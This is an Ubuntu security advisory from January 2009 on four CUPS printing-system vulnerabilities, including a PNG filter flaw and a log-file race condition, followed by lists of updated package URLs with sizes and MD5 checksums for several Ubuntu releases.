===========================================================
Ubuntu Security Notice USN-707-1           January 12, 2009
cups, cupsys vulnerabilities
CVE-2008-5183, CVE-2008-5184, CVE-2008-5286, CVE-2008-5377
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.10
Ubuntu 8.04 LTS
Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  cupsys                          1.2.2-0ubuntu0.6.06.12

Ubuntu 7.10:
  cupsys                          1.3.2-1ubuntu7.9

Ubuntu 8.04 LTS:
  cupsys                          1.3.7-1ubuntu3.3

Ubuntu 8.10:
  cups                            1.3.9-2ubuntu6.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

It was discovered that CUPS didn't properly handle adding a large number of RSS
subscriptions. A local user could exploit this and cause CUPS to crash, leading
to a denial of service. This issue only applied to Ubuntu 7.10, 8.04 LTS and
8.10. (CVE-2008-5183)

It was discovered that CUPS did not authenticate users when adding and
cancelling RSS subscriptions. An unprivileged local user could bypass intended
restrictions and add a large number of RSS subscriptions. This issue only
applied to Ubuntu 7.10 and 8.04 LTS. (CVE-2008-5184)

It was discovered that the PNG filter in CUPS did not properly handle certain
malformed images. If a user or automated system were tricked into opening a
crafted PNG image file, a remote attacker could cause a denial of service or
execute arbitrary code with user privileges. In Ubuntu 7.10, 8.04 LTS, and 8.10,
attackers would be isolated by the AppArmor CUPS profile. (CVE-2008-5286)

It was discovered that the example pstopdf CUPS filter created log files in an
insecure way. Local users could exploit a race condition to create or overwrite
files with the privileges of the user invoking the program. This issue only
applied to Ubuntu 6.06 LTS, 7.10, and 8.04 LTS. (CVE-2008-5377)


Updated packages for Ubuntu 6.06 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.2.2-0ubuntu0.6.06.12.diff.gz
      Size/MD5:   100650 effacab03a0a75663148e730badca56e
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.2.2-0ubuntu0.6.06.12.dsc
      Size/MD5:     1060 e320589ea4731d43a927b6ea986e2ca9
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.2.2.orig.tar.gz
      Size/MD5:  4070384 2c99b8aa4c8dc25c8a84f9c06aa52e3e

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2-gnutls10_1.2.2-0ubuntu0.6.06.12_all.deb
      Size/MD5:      996 01d1b0dbc0bf6fed042b103b81d91293

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-bsd_1.2.2-0ubuntu0.6.06.12_amd64.deb
      Size/MD5:    36230 ac91b545a2f40de7c165f160928334be
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-client_1.2.2-0ubuntu0.6.06.12_amd64.deb
      Size/MD5:    81912 f3ec3b95abadf43c3642d422bb1d8d64
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.2.2-0ubuntu0.6.06.12_amd64.deb
      Size/MD5:  2286872 779f854a26f5670c1183aac0a9adf15b
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2-dev_1.2.2-0ubuntu0.6.06.12_amd64.deb
      Size/MD5:     6092 e4f7e6b58bbcf3656487d779ada528d1
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2_1.2.2-0ubuntu0.6.06.12_amd64.deb
      Size/MD5:    77434 f7789b8cca7ea8f57ca2ca14f4cc1a9b
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2-dev_1.2.2-0ubuntu0.6.06.12_amd64.deb
      Size/MD5:    25748 e2a92ba2421bafc00df0a6c1f99bcda8
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2_1.2.2-0ubuntu0.6.06.12_amd64.deb
      Size/MD5:   130184 6a0808bf1ea2650d8a97fc50ceee0aa6

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-bsd_1.2.2-0ubuntu0.6.06.12_i386.deb
      Size/MD5:    34766 ec9c0af53c98f9d904a8241331179a6d
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-client_1.2.2-0ubuntu0.6.06.12_i386.deb
      Size/MD5:    77990 c582e927e8d8bbdd29c5c111bc0dd162
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.2.2-0ubuntu0.6.06.12_i386.deb
      Size/MD5:  2254158 f9e7ba99ce5ff49546a8922df47d0005
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2-dev_1.2.2-0ubuntu0.6.06.12_i386.deb
      Size/MD5:     6092 969b76527edef12a2f3c77a77c97480e
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2_1.2.2-0ubuntu0.6.06.12_i386.deb
      Size/MD5:    76550 2e653b4dac7063a7d290918bdafd43cf
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2-dev_1.2.2-0ubuntu0.6.06.12_i386.deb
      Size/MD5:    25748 cfff840b4e9984245fcd15d845183810
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2_1.2.2-0ubuntu0.6.06.12_i386.deb
      Size/MD5:   122384 ec7ddfb032ee70d393c65d9d90060ea0

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-bsd_1.2.2-0ubuntu0.6.06.12_powerpc.deb
      Size/MD5:    40466 119cafd93458295da6a6c8c12b35a262
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-client_1.2.2-0ubuntu0.6.06.12_powerpc.deb
      Size/MD5:    89530 bc52672d7f4903f7ec745cbe778e4da2
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.2.2-0ubuntu0.6.06.12_powerpc.deb
      Size/MD5:  2301402 e3bf63715dbebb29410ce13098b645f1
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2-dev_1.2.2-0ubuntu0.6.06.12_powerpc.deb
      Size/MD5:     6088 68fd62d76fc0a4e2e515f5a644852e60
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2_1.2.2-0ubuntu0.6.06.12_powerpc.deb
      Size/MD5:    79208 b83506e935ffd0ac4c1311f003424f2b
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2-dev_1.2.2-0ubuntu0.6.06.12_powerpc.deb
      Size/MD5:    25744 cb2ca08057f83b9b40b60960712d8766
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2_1.2.2-0ubuntu0.6.06.12_powerpc.deb
      Size/MD5:   128150 597300fc1511305508b9c0e62c061660

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-bsd_1.2.2-0ubuntu0.6.06.12_sparc.deb
      Size/MD5:    35388 afe7217a6f8ebe6fba8f7668f8a6d5bf
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-client_1.2.2-0ubuntu0.6.06.12_sparc.deb
      Size/MD5:    78722 0f5be23fb63000b5fb2945f4a40ad70a
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.2.2-0ubuntu0.6.06.12_sparc.deb
      Size/MD5:  2287758 3b8180329fa4c55ece2b828e07d3366c
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2-dev_1.2.2-0ubuntu0.6.06.12_sparc.deb
      Size/MD5:     6090 aee18e619e301cdd7472d6f6a326655c
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2_1.2.2-0ubuntu0.6.06.12_sparc.deb
      Size/MD5:    76468 398ecfef9fff03f088e4964ad0e76c71
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2-dev_1.2.2-0ubuntu0.6.06.12_sparc.deb
      Size/MD5:    25748 22655777c70067f973fef557c9196bdf
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2_1.2.2-0ubuntu0.6.06.12_sparc.deb
      Size/MD5:   123876 99879b6877338c254ae31dcd0f4bae29

Updated packages for Ubuntu 7.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.3.2-1ubuntu7.9.diff.gz
      Size/MD5:   129791 3e27f46f569ec5719b5fe13fb78a9f14
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.3.2-1ubuntu7.9.dsc
      Size/MD5:     1226 3a8eb42c55eb55163497543c39f23124
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.3.2.orig.tar.gz
      Size/MD5:  4848424 9e3e1dee4d872fdff0682041198d3d73

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-common_1.3.2-1ubuntu7.9_all.deb
      Size/MD5:  1080428 2a130e02392de2ce721ac25a9a71ef0f

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-bsd_1.3.2-1ubuntu7.9_amd64.deb
      Size/MD5:    37202 8a68cf9bfa98bda7cf30f6bfba41dd2e
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-client_1.3.2-1ubuntu7.9_amd64.deb
      Size/MD5:    89510 e721173ffa8c31fc92703b908140e84c
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.3.2-1ubuntu7.9_amd64.deb
      Size/MD5:  2034862 f512c15b34be6e169e9f947ca916ca93
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2-dev_1.3.2-1ubuntu7.9_amd64.deb
      Size/MD5:    60018 4f4e8635956b4b882074cc2760ebcb5e
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2_1.3.2-1ubuntu7.9_amd64.deb
      Size/MD5:    46878 197a3efe70b9864efe397bb27e455933
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2-dev_1.3.2-1ubuntu7.9_amd64.deb
      Size/MD5:   152008 c05765a56717613f12ca4e47dd751864
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2_1.3.2-1ubuntu7.9_amd64.deb
      Size/MD5:   186748 03cda4eef301db2a8f2cb6f5344c9f02

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-bsd_1.3.2-1ubuntu7.9_i386.deb
      Size/MD5:    36480 6742a1d19a47e85b583bfc6cc8e5bef1
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-client_1.3.2-1ubuntu7.9_i386.deb
      Size/MD5:    86482 33d1e6cc218245db992e2b8337d63fad
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.3.2-1ubuntu7.9_i386.deb
      Size/MD5:  2018562 6217c3d4a08b575b0fd01a2f0b6d9965
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2-dev_1.3.2-1ubuntu7.9_i386.deb
      Size/MD5:    58836 228f15292895fb6714cf83ac08376530
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2_1.3.2-1ubuntu7.9_i386.deb
      Size/MD5:    46256 a2a663a767af4beccac469b36af692b4
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2-dev_1.3.2-1ubuntu7.9_i386.deb
      Size/MD5:   145696 099603137d153ed2f50e0154fde6811f
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2_1.3.2-1ubuntu7.9_i386.deb
      Size/MD5:   183548 69d7d5292ed78f5a5dca16d9be7d9ebe

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/c/cupsys/cupsys-bsd_1.3.2-1ubuntu7.9_lpia.deb
      Size/MD5:    36670 2f95875950737fb3b29d8170e0e842be
    http://ports.ubuntu.com/pool/main/c/cupsys/cupsys-client_1.3.2-1ubuntu7.9_lpia.deb
      Size/MD5:    88296 51a1b00b3aa778300d6be240ca814448
    http://ports.ubuntu.com/pool/main/c/cupsys/cupsys_1.3.2-1ubuntu7.9_lpia.deb
      Size/MD5:  2021580 ec2e3b013c825e7b1c269778d722c41f
    http://ports.ubuntu.com/pool/main/c/cupsys/libcupsimage2-dev_1.3.2-1ubuntu7.9_lpia.deb
      Size/MD5:    59622 38519a455e3dca46fdc55980903ef527
    http://ports.ubuntu.com/pool/main/c/cupsys/libcupsimage2_1.3.2-1ubuntu7.9_lpia.deb
      Size/MD5:    47694 2a305b565e33a52d5cfe71bb09d3fbc0
    http://ports.ubuntu.com/pool/main/c/cupsys/libcupsys2-dev_1.3.2-1ubuntu7.9_lpia.deb
      Size/MD5:   142418 b0423e069760ca141c0e73f07b7049fb
    http://ports.ubuntu.com/pool/main/c/cupsys/libcupsys2_1.3.2-1ubuntu7.9_lpia.deb
      Size/MD5:   181750 8e286ae296e7b3fd216d7137a4c21c19

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-bsd_1.3.2-1ubuntu7.9_powerpc.deb
      Size/MD5:    46502 a1296168b5d3706b8870d2aca19cfc4a
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-client_1.3.2-1ubuntu7.9_powerpc.deb
      Size/MD5:   107760 d98d3f88cf3706b28ca9706e4f21897e
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.3.2-1ubuntu7.9_powerpc.deb
      Size/MD5:  2099848 088263da7a0baba49e4b28f000070cdf
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2-dev_1.3.2-1ubuntu7.9_powerpc.deb
      Size/MD5:    59484 85a44c9e70aadd41bdcb9401af938361
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2_1.3.2-1ubuntu7.9_powerpc.deb
      Size/MD5:    51846 4442245f4cf71913bbd642f5185f93a0
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2-dev_1.3.2-1ubuntu7.9_powerpc.deb
      Size/MD5:   146944 ca2f12efe3d8b1ef0711019a6f4be4a3
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2_1.3.2-1ubuntu7.9_powerpc.deb
      Size/MD5:   192530 47b0cc559fb4548701addb4e389beda1

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-bsd_1.3.2-1ubuntu7.9_sparc.deb
      Size/MD5:    37568 441cbf24d055107a408220ea945357e6
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-client_1.3.2-1ubuntu7.9_sparc.deb
      Size/MD5:    89612 42f545e2092863afc31a6beb921ba803
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.3.2-1ubuntu7.9_sparc.deb
      Size/MD5:  2061116 df2be5541017e5a11f265dc0420d1de4
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2-dev_1.3.2-1ubuntu7.9_sparc.deb
      Size/MD5:    58094 4602a5ee17eae8d0769901ffff089eac
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2_1.3.2-1ubuntu7.9_sparc.deb
      Size/MD5:    45560 fce319567830955760626e98a52bd9e0
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2-dev_1.3.2-1ubuntu7.9_sparc.deb
      Size/MD5:   148474 0fa2f0010fbd4b08d91b1c62765ed46e
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2_1.3.2-1ubuntu7.9_sparc.deb
      Size/MD5:   182570 ef1eec9c88b499b3cea8742fc31d8edf

Updated packages for Ubuntu 8.04 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.3.7-1ubuntu3.3.diff.gz
      Size/MD5:   134438 a4a1876673e461e35cfec8952ca054f5
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.3.7-1ubuntu3.3.dsc
      Size/MD5:     1441 2ced31d2fde396439410f30e758d7db2
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.3.7.orig.tar.gz
      Size/MD5:  4700333 383e556d9841475847da6076c88da467

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-common_1.3.7-1ubuntu3.3_all.deb
      Size/MD5:  1144166 4893a05510da7c9b5434d00fc29e455f

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-bsd_1.3.7-1ubuntu3.3_amd64.deb
      Size/MD5:    37532 480443df9d0723c844c0c0f6408169a2
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-client_1.3.7-1ubuntu3.3_amd64.deb
      Size/MD5:    89978 0d287573cdcc4701998ce53af56dd3f9
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.3.7-1ubuntu3.3_amd64.deb
      Size/MD5:  1880612 2314ea0930f6d00794e0176916b6da35
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2-dev_1.3.7-1ubuntu3.3_amd64.deb
      Size/MD5:    60906 9042974135c36a37171a424b7d4a202d
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2_1.3.7-1ubuntu3.3_amd64.deb
      Size/MD5:    50368 3cd1eb8125943eaa9ee6dde601f4422e
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2-dev_1.3.7-1ubuntu3.3_amd64.deb
      Size/MD5:   344934 c5aec8c571564cbd0c895145a875d02a
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2_1.3.7-1ubuntu3.3_amd64.deb
      Size/MD5:   177930 36d56cb0664534f425871d13d77e4b1a

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-bsd_1.3.7-1ubuntu3.3_i386.deb
      Size/MD5:    36968 6f01ef27169dfc9aa944c5049acbbe63
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-client_1.3.7-1ubuntu3.3_i386.deb
      Size/MD5:    88402 dd874fead670a6d57e90176ad1facc94
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.3.7-1ubuntu3.3_i386.deb
      Size/MD5:  1863008 ff961e2dbb46de7be8722d88178a38e6
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2-dev_1.3.7-1ubuntu3.3_i386.deb
      Size/MD5:    60100 0881e753bb681af3463d6ed8d11c09cf
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2_1.3.7-1ubuntu3.3_i386.deb
      Size/MD5:    49846 07a541a01b7e231c9988e779a3f602d0
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2-dev_1.3.7-1ubuntu3.3_i386.deb
      Size/MD5:   339346 d5efe383bc97ce56837e36806bfba341
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2_1.3.7-1ubuntu3.3_i386.deb
      Size/MD5:   174778 a578d4f7a0fe9195167e7a0cafc37974

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/c/cupsys/cupsys-bsd_1.3.7-1ubuntu3.3_lpia.deb
      Size/MD5:    36678 3176e400d418ca744825919b30d1a248
    http://ports.ubuntu.com/pool/main/c/cupsys/cupsys-client_1.3.7-1ubuntu3.3_lpia.deb
      Size/MD5:    88752 998f5ae89f57c5a3874a2bec71f435af
    http://ports.ubuntu.com/pool/main/c/cupsys/cupsys_1.3.7-1ubuntu3.3_lpia.deb
      Size/MD5:  1865256 715aafc333b7d070b516950843cdf664
    http://ports.ubuntu.com/pool/main/c/cupsys/libcupsimage2-dev_1.3.7-1ubuntu3.3_lpia.deb
      Size/MD5:    60548 39aa25aae6614a78a0b3c29e30d464f9
    http://ports.ubuntu.com/pool/main/c/cupsys/libcupsimage2_1.3.7-1ubuntu3.3_lpia.deb
      Size/MD5:    50860 1ba114f3487de2725c3704efbaf6a5c5
    http://ports.ubuntu.com/pool/main/c/cupsys/libcupsys2-dev_1.3.7-1ubuntu3.3_lpia.deb
      Size/MD5:   337010 98f33df59e831f8213370b533c9a6f7b
    http://ports.ubuntu.com/pool/main/c/cupsys/libcupsys2_1.3.7-1ubuntu3.3_lpia.deb
      Size/MD5:   173708 dca1c947f9af44e5d4c6bc2c604aa371

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/c/cupsys/cupsys-bsd_1.3.7-1ubuntu3.3_powerpc.deb
      Size/MD5:    46930 5baf8d502a2bdca9954d98a542e92f1b
    http://ports.ubuntu.com/pool/main/c/cupsys/cupsys-client_1.3.7-1ubuntu3.3_powerpc.deb
      Size/MD5:   110824 b0aab96be927c4d4924df4c45049f8a0
    http://ports.ubuntu.com/pool/main/c/cupsys/cupsys_1.3.7-1ubuntu3.3_powerpc.deb
      Size/MD5:  1949124 d53346f89338971030ed9a202726849c
    http://ports.ubuntu.com/pool/main/c/cupsys/libcupsimage2-dev_1.3.7-1ubuntu3.3_powerpc.deb
      Size/MD5:    59928 0c7f0193cfee10e401ca8304bc6a20bb
    http://ports.ubuntu.com/pool/main/c/cupsys/libcupsimage2_1.3.7-1ubuntu3.3_powerpc.deb
      Size/MD5:    54930 694817b2babba26327d4b021a36f938a
    http://ports.ubuntu.com/pool/main/c/cupsys/libcupsys2-dev_1.3.7-1ubuntu3.3_powerpc.deb
      Size/MD5:   341674 78be76c752899ff02d96f7d9f4c8cbc1
    http://ports.ubuntu.com/pool/main/c/cupsys/libcupsys2_1.3.7-1ubuntu3.3_powerpc.deb
      Size/MD5:   183682 2dfb517ad5388b6471fc3f33148110c7

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/c/cupsys/cupsys-bsd_1.3.7-1ubuntu3.3_sparc.deb
      Size/MD5:    38030 018dbd428bea31bff3efe42c650ab930
    http://ports.ubuntu.com/pool/main/c/cupsys/cupsys-client_1.3.7-1ubuntu3.3_sparc.deb
      Size/MD5:    91034 0cdf41119c49465205ec9d85e0fcedcb
    http://ports.ubuntu.com/pool/main/c/cupsys/cupsys_1.3.7-1ubuntu3.3_sparc.deb
      Size/MD5:  1897932 265d337f28fada008fdf22034c76d43b
    http://ports.ubuntu.com/pool/main/c/cupsys/libcupsimage2-dev_1.3.7-1ubuntu3.3_sparc.deb
      Size/MD5:    57852 5ebf07d4d87d5c0ba46bb52b0cabe6bd
    http://ports.ubuntu.com/pool/main/c/cupsys/libcupsimage2_1.3.7-1ubuntu3.3_sparc.deb
      Size/MD5:    48224 ed14b7888ad80c70678b20881c6b9606
    http://ports.ubuntu.com/pool/main/c/cupsys/libcupsys2-dev_1.3.7-1ubuntu3.3_sparc.deb
      Size/MD5:   341382 ed914dcee1d36a7437ebdb46d44fba62
    http://ports.ubuntu.com/pool/main/c/cupsys/libcupsys2_1.3.7-1ubuntu3.3_sparc.deb
      Size/MD5:   173608 98ee538398dcf7c112099d3e398b686e

Updated packages for Ubuntu 8.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/c/cups/cups_1.3.9-2ubuntu6.1.diff.gz
      Size/MD5:   328034 b25d444f40ebc1f17984cb538172480c
    http://security.ubuntu.com/ubuntu/pool/main/c/cups/cups_1.3.9-2ubuntu6.1.dsc
      Size/MD5:     2043 3b36a5cadfe85ed62bf8b28de6ec7591
    http://security.ubuntu.com/ubuntu/pool/main/c/cups/cups_1.3.9.orig.tar.gz
      Size/MD5:  4809771 e6f2d90491ed050e5ff2104b617b88ea

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/c/cups/cups-common_1.3.9-2ubuntu6.1_all.deb
      Size/MD5:  1162340 88ad6900549400af9f75f927227d45cb
    http://security.ubuntu.com/ubuntu/pool/main/c/cups/cupsys-bsd_1.3.9-2ubuntu6.1_all.deb
      Size/MD5:    57652 7a33348b800c156e43a83e9083436bd5
    http://security.ubuntu.com/ubuntu/pool/main/c/cups/cupsys-client_1.3.9-2ubuntu6.1_all.deb
      Size/MD5:    57660 6c89ff2b1f7fe264b5caaaf986b36d9c
    http://security.ubuntu.com/ubuntu/pool/main/c/cups/cupsys-dbg_1.3.9-2ubuntu6.1_all.deb
      Size/MD5:    57652 ee1e3c3d68c190281678d7c1e7adadc9
    http://security.ubuntu.com/ubuntu/pool/main/c/cups/cupsys_1.3.9-2ubuntu6.1_all.deb
      Size/MD5:    57656 2e8d25c423fbc2e265b0d56633ebc67d
    http://security.ubuntu.com/ubuntu/pool/main/c/cups/libcupsys2-dev_1.3.9-2ubuntu6.1_all.deb
      Size/MD5:    57670 b0c0e0f336be70d0c458b45936f98d0d
    http://security.ubuntu.com/ubuntu/pool/universe/c/cups/cupsys-common_1.3.9-2ubuntu6.1_all.deb
      Size/MD5:     4530 23fb36af369fe018cd11fb3291dcc3cc
    http://security.ubuntu.com/ubuntu/pool/universe/c/cups/libcupsys2_1.3.9-2ubuntu6.1_all.deb
      Size/MD5:    57656 46de04530c997f729b7dce967559c8b3

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/c/cups/cups-bsd_1.3.9-2ubuntu6.1_amd64.deb
      Size/MD5:    37318 7c4c4cadb4f9b7f6e2c6080b790e6ee1
    http://security.ubuntu.com/ubuntu/pool/main/c/cups/cups-client_1.3.9-2ubuntu6.1_amd64.deb
      Size/MD5:   119788 72cab9079aeefee51e09a3b31ae592fa
    http://security.ubuntu.com/ubuntu/pool/main/c/cups/cups-dbg_1.3.9-2ubuntu6.1_amd64.deb
      Size/MD5:  1682518 3180c4e3fa3d5cfe0b2b894898485fdd
    http://security.ubuntu.com/ubuntu/pool/main/c/cups/cups_1.3.9-2ubuntu6.1_amd64.deb
      Size/MD5:  2172420 d7928f5c71b128511a0864db35ba6fe9
    http://security.ubuntu.com/ubuntu/pool/main/c/cups/libcups2-dev_1.3.9-2ubuntu6.1_amd64.deb
      Size/MD5:   352208 ba6478c9d8f3712b0c1e648e48bbb0c3
    http://security.ubuntu.com/ubuntu/pool/main/c/cups/libcups2_1.3.9-2ubuntu6.1_amd64.deb
      Size/MD5:   172690 b2f7befc45ccf3bcd176186f9c48ceb1
    http://security.ubuntu.com/ubuntu/pool/main/c/cups/libcupsimage2-dev_1.3.9-2ubuntu6.1_amd64.deb
      Size/MD5:    61404 a16ecd777aca26b88c24d16b69e5f193
    http://security.ubuntu.com/ubuntu/pool/main/c/cups/libcupsimage2_1.3.9-2ubuntu6.1_amd64.deb
      Size/MD5:    52392 7a9f6aabf047ad3225f8ec44d2fb5540

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/c/cups/cups-bsd_1.3.9-2ubuntu6.1_i386.deb
      Size/MD5:    36216 b4999abd3bf22b2963db0969b40da8e1
    http://security.ubuntu.com/ubuntu/pool/main/c/cups/cups-client_1.3.9-2ubuntu6.1_i386.deb
      Size/MD5:   115352 9ec804831b4557a4ada56602384ecc39
    http://security.ubuntu.com/ubuntu/pool/main/c/cups/cups-dbg_1.3.9-2ubuntu6.1_i386.deb
      Size/MD5:  1542016 c120e8f977f4b19be21e3b3067ca0df5
    http://security.ubuntu.com/ubuntu/pool/main/c/cups/cups_1.3.9-2ubuntu6.1_i386.deb
      Size/MD5:  2139174 18db7072b040bc4f3319b3b51361a239
    http://security.ubuntu.com/ubuntu/pool/main/c/cups/libcups2-dev_1.3.9-2ubuntu6.1_i386.deb
      Size/MD5:   345996 53a7bdb95ee0b5d3b0f96c463710dadd
    http://security.ubuntu.com/ubuntu/pool/main/c/cups/libcups2_1.3.9-2ubuntu6.1_i386.deb
      Size/MD5:   169534 efa2f12acaf19bfab23d60478b5586cd
    http://security.ubuntu.com/ubuntu/pool/main/c/cups/libcupsimage2-dev_1.3.9-2ubuntu6.1_i386.deb
      Size/MD5:    60536 ceb4ded5423c0a25ddcc924d29e390f5
    http://security.ubuntu.com/ubuntu/pool/main/c/cups/libcupsimage2_1.3.9-2ubuntu6.1_i386.deb
      Size/MD5:    51750 cf8f8190d6281a5881b8cc1922035758

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/c/cups/cups-bsd_1.3.9-2ubuntu6.1_lpia.deb
      Size/MD5:    36030 95ca36c48f733f3d709e94c2202e97db
    http://ports.ubuntu.com/pool/main/c/cups/cups-client_1.3.9-2ubuntu6.1_lpia.deb
      Size/MD5:   114514 c44f5a21e630c130008be55aa258cb42
    http://ports.ubuntu.com/pool/main/c/cups/cups-dbg_1.3.9-2ubuntu6.1_lpia.deb
      Size/MD5:  1571226 37ce539f88c38ba11a89515ddc188d2c
    http://ports.ubuntu.com/pool/main/c/cups/cups_1.3.9-2ubuntu6.1_lpia.deb
      Size/MD5:  2135890 46cb00e52f60f8adc58496bc550a5ad9
    http://ports.ubuntu.com/pool/main/c/cups/libcups2-dev_1.3.9-2ubuntu6.1_lpia.deb
      Size/MD5:   342976 e14329c1e782470735f35422c592b473
    http://ports.ubuntu.com/pool/main/c/cups/libcups2_1.3.9-2ubuntu6.1_lpia.deb
      Size/MD5:   167800 9cbad1fe09d9904ae6e026987d85731a
